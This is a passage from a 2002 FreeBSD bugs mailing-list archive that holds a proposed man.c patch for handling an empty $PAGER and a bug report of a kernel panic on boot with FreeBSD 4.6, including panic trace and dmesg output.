(8.12.4/8.12.4) with ESMTP id g5TFU3JU020518 for ; Sat, 29 Jun 2002 08:30:03 -0700 (PDT) (envelope-from gnats@freefall.freebsd.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.12.4/8.12.4/Submit) id g5TFU3CN020517; Sat, 29 Jun 2002 08:30:03 -0700 (PDT) Date: Sat, 29 Jun 2002 08:30:03 -0700 (PDT) Message-Id: <200206291530.g5TFU3CN020517@freefall.freebsd.org> To: freebsd-bugs@FreeBSD.org Cc: From: "dave" Subject: Re: bin/37662: man(1) fails to display anything if $PAGER is set but blank Reply-To: "dave" Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org The following reply was made to PR bin/37662; it has been noted by GNATS. From: "dave" To: Cc: , Subject: Re: bin/37662: man(1) fails to display anything if $PAGER is set but blank Date: Sun, 30 Jun 2002 01:23:58 +1000 Upon re-reading, maybe this, or something similiar would be the appropriate solution? Not sure exactly if this handles errors in the correct way. Feel free to change at will! --- man.c.orig Sun Jun 30 00:49:28 2002 +++ man.c Sun Jun 30 01:17:26 2002 @@ -836,10 +836,16 @@ { char *expander = get_expander (file); - if (expander != NULL) + if (expander != NULL && pager != NULL && *pager != '\0') snprintf (command, sizeof(command), "%s %s | %s", expander, file, pager); - else + else if (expander != NULL && pager != NULL && *pager == '\0') + snprintf (command, sizeof(command), "%s %s", expander, file); + else if (pager != NULL && *pager != '\0') snprintf (command, sizeof(command), "%s %s", pager, file); + else { + perror("no expander or pager. do not know how to display manpage"); + exit(1); + } found = do_system_command (command); } Dave To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Sat Jun 29 10: 0:22 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id A618437B400 for ; Sat, 29 Jun 2002 10:00:07 -0700 (PDT) Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by mx1.FreeBSD.org (Postfix) with ESMTP id 2D14843E1A for ; Sat, 29 Jun 2002 10:00:06 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: from freefall.freebsd.org (gnats@localhost [127.0.0.1]) by freefall.freebsd.org (8.12.4/8.12.4) with ESMTP id g5TH05JU032676 for ; Sat, 29 Jun 2002 10:00:05 -0700 (PDT) (envelope-from gnats@freefall.freebsd.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.12.4/8.12.4/Submit) id g5TH05dX032675; Sat, 29 Jun 2002 10:00:05 -0700 (PDT) Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id C416737B400 for ; Sat, 29 Jun 2002 09:50:21 -0700 (PDT) Received: from www.freebsd.org (www.FreeBSD.org [216.136.204.117]) by mx1.FreeBSD.org (Postfix) with ESMTP id 6FC7D43E09 for ; Sat, 29 Jun 2002 09:50:21 -0700 (PDT) (envelope-from nobody@FreeBSD.org) Received: from www.freebsd.org (localhost [127.0.0.1]) by www.freebsd.org (8.12.4/8.12.4) with ESMTP id g5TGoKOT083769 for ; Sat, 29 Jun 2002 09:50:20 -0700 (PDT) (envelope-from nobody@www.freebsd.org) Received: (from nobody@localhost) by www.freebsd.org (8.12.4/8.12.4/Submit) id g5TGoK91083768; Sat, 29 Jun 2002 09:50:20 -0700 (PDT) Message-Id: <200206291650.g5TGoK91083768@www.freebsd.org> Date: Sat, 29 Jun 2002 09:50:20 -0700 (PDT) From: Charles Sprickman To: freebsd-gnats-submit@FreeBSD.org X-Send-Pr-Version: www-1.0 Subject: kern/40003: Panic on boot w/4.6 and 4.6-stable from 6/28 Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org >Number: 40003 >Category: kern >Synopsis: Panic on boot w/4.6 and 4.6-stable from 6/28 >Confidential: no >Severity: critical >Priority: high >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Sat Jun 29 10:00:05 PDT 2002 >Closed-Date: >Last-Modified: >Originator: Charles Sprickman >Release: 4.6 stable 6/28 >Organization: >Environment: Install didn't complete >Description: I have a very old no-name machine with a no-name mobo that I use as a firewall at home (full dmesg from the running kernel below). I tried an early pre-4.6 snapshot, and got a panic on boot. Today I thought I'd try the latest -stable snapshot (today's from snapshots.jp.freebsd.org) and received the same result. There's no strange hardware in it, just the built-in IDE controllers and two SMC ISA ethernet NICs (ed driver). On two occasions I got a panic, on two others I got a hang right after the lines: ata0: at 0x1f0 irq 14 on atapci0 ata1: at 0x170 irq 15 on atapci0 screenshot at http://home.manymonkeys.com/hang.jpg The panic was after the lines: ad0: READ command timeout ....? ata0: resetting devices .. ata0-slave: ATA identity ? done ad0: 1916MB [893/16/63] at ata0-master BIOSDMA Fatal trap 12: page fault while in kernel mode fault virtual address = 0x6 fault code = supervisor read, page not present instruction pointer = 0x8(?):0xc015431d stack pointer = 0x10:0xc003efa4 frame pointer = 0x10:0xc003efbc code segment = base 0x0, limit 0xfffff, type 0x1b = DPL 0, pres 1, def32 1, gran 1 processor eflags = interrupt enabled, resume, IOPL = 0 current process = 0 (swapper) interrupt mask = bio trap number = 12 panic: page fault syncing disks... etc. I'm having trouble telling the difference between "8" and "0" in the above, my camera just couldn't get me a clear image. I hope this is enough to go on. screenshot at http://home.manymonkeys.com/panic.jpg Currently the machine is running fine with: FreeBSD gw.nat.fasttrackmonkey.com 4.4-RELEASE FreeBSD 4.4-RELEASE #0: Sat Apr 27 18:31:15 EDT 2002 It has some problems with the IDE controller during boot, but continues fine: ad0: 1916MB [3893/16/63] at ata0-master BIOSDMA ata1-master: simplex device, DMA on primary only acd0: CDROM at ata1-master using BIOSPIO Mounting root from ufs:/dev/ad0s1a ad0: READ command timeout tag=0 serv=0 - resetting ata0: resetting devices .. done ad0: READ command timeout tag=0 serv=0 - resetting ata0: resetting devices .. done ad0: READ command timeout tag=0 serv=0 - resetting ata0: resetting devices .. done ad0: READ command timeout tag=0 serv=0 - resetting ad0: trying fallback to PIO mode ata0: resetting devices .. done The "fallback to PIO mode" seems to fix things up. Please let me know if you folks need any more info, I'm looking forward to getting this thing back on track with -stable. CS ----- Here's a full dmesg of the 4.4 kernel running on it: Copyright (c) 1992-2001 The FreeBSD Project. Copyright (c) 1979, 1980, 1983, 1986, 1988, 1989, 1991, 1992, 1993, 1994 The Regents of the University of California. All rights reserved. FreeBSD 4.4-RELEASE #0: Sat Apr 27 18:31:15 EDT 2002 spork@angryfist.fasttrackmonkey.com:/usr/src/sys/compile/BIGRED_IPF_PPPOE Timecounter "i8254" frequency 1193182 Hz CPU: AMD Am5x86 Write-Back (486-class CPU) Origin = "AuthenticAMD" Id = 0x4f4 Stepping = 4 Features=0x1 real memory = 33554432 (32768K bytes) avail memory = 29609984 (28916K bytes) Preloaded elf kernel "kernel" at 0xc0329000. VESA: v1.2, 2048k memory, flags:0x0, mode table:0xc00c1bed (c0001bed) VESA: S3 Incorporated. 86C325 md0: Malloc disk npx0: on motherboard npx0: INT 16 interface pcib0: on motherboard pci0: on pcib0 pci0: at 13.0 irq 12 pcib1: at device 16.0 on pci0 isab0: at device 18.0 on pci0 isa0: on isab0 atapci0: port 0xffa0-0xffaf,0xfff0-0xfff3,0xffe0-0x ffe7,0x374-0x377,0x170-0x177 at device 18.1 on pci0 ata0: at 0x1f0 irq 14 on atapci0 ata1: at 0x170 irq 15 on atapci0 orm0: